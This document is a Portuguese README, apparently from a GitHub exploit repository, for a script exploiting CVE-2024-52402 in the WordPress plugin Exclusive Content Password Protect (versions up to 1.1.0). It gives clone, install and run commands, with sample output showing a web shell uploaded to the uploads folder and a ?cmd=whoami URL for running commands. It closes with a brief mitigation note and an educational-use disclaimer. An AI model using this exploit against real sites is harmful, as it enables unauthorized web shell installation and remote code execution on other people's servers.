
Plugin WordPress Exclusive Content Password Protect <= 1.1.0 - vulnerabilidade de CSRF para Arbitrary File Upload
Este exploit visa uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no plugin WordPress Exclusive Content Password Protect, versões até e incluindo 1.1.0. Esta vulnerabilidade permite que um atacante faça upload de um web shell para o servidor web, levando a potencial execução remota de código.
Para explorar esta vulnerabilidade, você precisa fornecer a URL do site WordPress alvo, um nome de usuário e senha válidos do WordPress. O script de exploit fará login no site WordPress e tentará fazer upload de um web shell.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
Este script explora a vulnerabilidade CSRF no plugin Exclusive Content Password Protect para fazer upload de um Web Shell para o servidor WordPress. No entanto, ele não executa um ataque CSRF diretamente; em vez disso, foca em alavancar a funcionalidade de upload de arquivos do plugin para alcançar a exploração.
Clone o Repositório
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
Instale os Requisitos
Certifique-se de ter a biblioteca requests instalada:
pip install requests
Execute o Script Use o seguinte comando para executar o script:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
Para mitigar esta vulnerabilidade, atualize o plugin Exclusive Content Password Protect para a versão mais recente onde este problema foi corrigido.
Este script destina-se apenas a fins educacionais. O uso não autorizado deste script contra sistemas para os quais você não tem permissão explícita para testar é ilegal e antiético.
Exploit por: Nxploit, Khaled alenazi.